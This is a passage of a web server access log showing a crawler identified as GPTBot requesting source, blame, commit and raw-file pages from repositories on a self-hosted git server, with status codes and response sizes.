"/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10195] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009109] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 10533] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:52:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" +[17/Feb/2026:13:52:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:13:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 84415] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:13:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:13:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 10529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 10340] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 84458] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:52:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:13:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 18398] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 12810] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 23739] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:13:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10846] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:13:52:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:13:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 11645] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 10951] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:13:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11853] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9989] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 12375] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12242] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 11089] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10973] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 12281] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10855] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" [Client 74.7.227.38] [Length 10708] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 378859] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:13:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" +[17/Feb/2026:13:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 783] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:13:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist" +[17/Feb/2026:13:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:13:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 10114] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:13:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:13:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:13:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 75] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:13:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 11698] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:13:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10429] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9468] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:13:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build" [Client 74.7.227.38] [Length 10384] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 